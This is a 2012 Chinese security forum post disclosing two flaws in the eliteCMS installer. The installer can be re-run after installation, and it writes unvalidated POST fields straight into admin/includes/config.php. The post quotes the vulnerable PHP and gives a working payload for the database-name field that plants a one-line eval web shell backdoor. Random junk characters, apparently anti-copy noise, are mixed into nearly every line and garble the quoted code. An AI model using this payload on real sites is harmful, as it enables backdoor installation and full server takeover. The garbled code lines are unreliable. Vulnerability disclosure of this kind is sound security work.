找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2267|回复: 0
打印 上一主题 下一主题

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-18 13:59:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装+ U( [; A5 \' q: {, w& T

* v/ R3 a' P/ O: _: h另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php+ r  j9 Z" i. _0 O
我们来看代码:
( o9 L. D5 c2 u) b! {
% w: z+ e" ^- A7 I- G7 a..." s+ d/ v, X1 y. y. Z9 ~# L
elseif ($_GET['step'] == "4") {
( g% ~: s. u+ ^) T6 e    $file = "../admin/includes/config.php";
2 j2 S+ b3 f/ F    $write = "<?php\n";2 @& G$ N4 @. N: Q
    $write .= "/**\n";4 d; N( |/ l5 Q7 O/ G# p9 {
    $write .= "*\n";
' o* \# y- S9 c5 c    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
' \- c4 @) V$ u' ^...略...
+ ?) v& W: u7 Y# v0 K6 f( ]6 H    $write .= "*\n";
% ^4 @! C$ I6 [4 _% S; e- ?    $write .= "*/\n";
: Q+ }1 @: A- ]% A6 O    $write .= "\n";
" z/ @/ G$ N. Y& m! L% S    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
  `9 ]9 v5 i+ K/ C1 m    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";' w2 t  u9 ^2 [% a. p
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";# j! D% q$ k; I
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
) D! [3 e8 z- j; K1 {, m    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";. X- e, S2 S9 A" I1 q
    $write .= "if (!\$connection) {\n";/ I! u3 j" ]1 F6 U0 t. {# V$ o
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";0 z$ g% O  u- \$ K. ^
    $write .= "        \n";4 ^; L3 n5 V# H3 C% m
    $write .= "} \n";
# z/ u1 _! c; p: r    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";% K6 o$ \! u) M: ]8 U, \- V
    $write .= "if (!\$db_select) {\n";
0 Y$ G1 s" \& W7 R6 r    $write .= "        die(\"Database select failed\" .mysql_error());\n";
* S0 C- ]7 K/ C0 \0 P* X. Z7 T    $write .= "        \n";' x( {$ {0 ~1 _- P# G' U# \2 x
    $write .= "} \n";
' O1 p% F1 n0 u& w5 n( ~    $write .= "?>\n";
! S# A; W: w( m/ n
! k# @+ ]+ c8 Q' i3 @7 \* O    $writer = fopen($file, 'w');8 T/ l$ s* }, \6 N0 u2 l
...6 @8 X% q9 d5 ?( C
. m. j9 J& q3 j
在看代码:
* t3 ^! b6 a) D0 @& V3 ^ 7 V# u/ r  C( T$ M+ \
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];6 n4 D' ^+ Y: I, k, `  e
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
4 O6 y  A4 [; v" y6 v( E7 ^$_SESSION['DB_USER'] = $_POST['DB_USER'];
0 c0 h' Y! Q- c5 {, a6 ?5 G3 z! f$_SESSION['DB_PASS'] = $_POST['DB_PASS'];1 W8 l& D- X+ F. U& j

$ Z2 x, w! K4 v7 P* i& c) M: K: u取值未作任何验证
: e( ^- {! ^  j% z) @" M/ J如果将数据库名POST数据:
& D5 \0 V6 b: ]0 T . \9 T+ L0 B( _% B8 a' |- ?
"?><?php eval($_POST[c]);?><?php% \9 u4 x7 `$ g) |( L, p
3 Z5 v; X$ P( y  {
将导致一句话后门写入/admin/includes/config.php
7 b# A( l! ?% d! C. a6 i8 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表